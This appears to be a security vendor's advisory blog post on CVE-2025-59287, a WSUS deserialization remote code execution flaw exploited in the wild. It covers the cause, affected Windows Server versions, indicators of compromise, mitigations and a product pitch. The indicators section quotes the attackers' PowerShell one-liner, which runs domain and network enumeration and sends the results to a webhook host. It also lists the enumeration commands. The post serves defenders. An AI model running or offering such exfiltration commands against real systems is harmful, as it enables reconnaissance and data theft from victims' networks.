On October 23rd, Microsoft released an unusual out-of-band security patch for CVE-2025-59287, a remote code execution vulnerability in WSUS (Windows server update services) that is being exploited in the wild.
What is WSUS?
WSUS (Windows server update services) is a service allowing IT managers and administrators to centrally manage, update and patch the organization’s computers. It downloads updates from Microsoft, stores them locally, and lets IT control which updates are approved, when they are distributed, and which computer groups receive them.
About CVE-2025-59287
This vulnerability was initially released on October 14th, and addressed in October’s patch Tuesday, but on the 23rd Microsoft released an urgent update to the patch, as the original one was not comprehensive enough.
This vulnerability stems from inadequate type validation before deserialization of information sent to the vulnerable endpoint through an encrypted cookie (named AuthorizationCookie) via a call like GetCookie().
The .NET BinaryFormatter.Deserialize() method then deserializes the decrypted cookie, which then runs in the WSUS process context (SYSTEM), which allows arbitrary code to run.
Exploits in the wild
Since October 23rd researchers have reported seeing exploitations of this vulnerability.
According to Huntress, the exploitation activity included spawning Command Prompt and PowerShell via the HTTP worker process and WSUS service binary, decoding and executing of a base-64-encoded payload that enumerated servers for sensitive information and extracted results to a remote webhook, and saw Proxy networks were used by the attackers to conduct and obfuscate exploitation.
Additionally, some researchers say the way the exploit was performed, one can assume state actors or advanced ransomware gangs were involved in weaponizing the CVE in such a short time.
CISA has added CVE-2025-59287 to its Known Exploited Vulnerabilities catalog and directed US federal civilian agencies to mitigate it by November 14, 2025.
Affected systems and IOCs
The vulnerability affects WSUS Server Role enabled installations on the following Windows Server versions:
- Windows Server 2012
- Windows Server 2012 R2
- Windows Server 2016
- Windows Server 2019
- Windows Server 2022 (including 23H2, Server Core)
- Windows Server 2025 (Server Core) NSFOCUS
If the WSUS Server Role is not enabled on the machine, then the machine is not vulnerable.
An affected system might notice:
- An anomalous rise in reconnaissance queries searching for users, system and active directory settings, passwords, sensitive network and user information
- Powershell.exe spawned from w3wp.exe and wsusservice.exe
- This script:
powershell -ec try{$r= (&{echo https://[REDACTED]:8531; net user /domain; ipconfig /all} |out-string)+ $Error }catch{$_.ToString()} ;$w="http://webhook.site/[REDACTED]";try{iwr -UseBasicParsing -Uri $w -Body $r -Method Put}catch{curl.exe -k $w --data-binary $r}- Enumeration commands:
whoami;net user /domain net user /domain; ipconfig /allMitigation
- Apply the relevant patch to WSUS – you can find Microsoft’s guide here
- Restrict network access to the WSUS server – we recommend to limit all network access to WSUS servers, as they have a significant control over the network, but if that is not possible it is important to close access to the known ports – 8530 and 8531
How can Orca help?
The Orca Cloud Security Platform continuously scans for vulnerabilities in your cloud environments, including AWS, Azure, Google, Kubernetes, and others. When Orca finds a vulnerability, it will immediately create an alert and assign a risk score by considering the full contextual picture of the risk and the surrounding cloud environment so teams know which vulnerabilities need to be patched first.
The Orca Platform displays trending vulnerabilities in the “From the News” widget of the Orca dashboard. Users can see if their environment is vulnerable to CVE-2025-59287 and how to remediate it.
Orca also gives you complete visibility and insight into your attack surface, revealing how an attacker might use the vulnerability to exploit other risks and endanger high-value assets in your environment.
Learn more
If you’re interested in learning more about the Orca Platform and how it can help you protect against CVE-2025-59287 and other vulnerabilities, schedule a personalized 1:1 demo.
